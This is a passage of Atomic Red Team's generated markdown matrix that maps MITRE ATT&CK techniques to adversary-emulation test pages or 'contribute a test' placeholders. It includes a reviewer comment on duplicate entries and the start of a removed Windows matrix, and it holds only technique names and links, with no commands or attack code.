| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Build Image on Host](../../T1612/T1612.md) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Authentication Package](../../T1547.002/T1547.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | [Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | | DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | [Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [BITS Jobs](../../T1197/T1197.md) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | | | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | | | Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Masquerading: Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | | | | | | |
| | | | | Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | | | NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) | | | | | | | |
| | | | | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | | | | | | |
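Review bot: the same technique is emitted more than once within a single column of this generated matrix, so the "CONTRIBUTE A TEST" placeholders overstate the coverage gap and will point contributors at techniques that already have tests. In the fifth column, "Web Session Cookie [CONTRIBUTE A TEST]" appears twice, and several placeholders sit beside an already-linked sub-technique of the same name, for example "Space after Filename [CONTRIBUTE A TEST]" next to `[Masquerading: Space after Filename](../../T1036.006/T1036.006.md)`, "NTFS File Attributes [CONTRIBUTE A TEST]" next to `[Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)`, and "Compile After Delivery [CONTRIBUTE A TEST]" next to `[Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)`; the same pattern holds for "Hidden Users", "Hidden Files and Directories", "Mshta" and "Software Packing". The unlinked copies carry the pre-sub-technique names of the same ATT&CK entries, so the generator should key rows on technique ID and skip entries the ATT&CK data marks as revoked or deprecated, or at minimum dedupe by name within each column, before this table is regenerated and committed.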
-183
@@ -1,183 +0,0 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
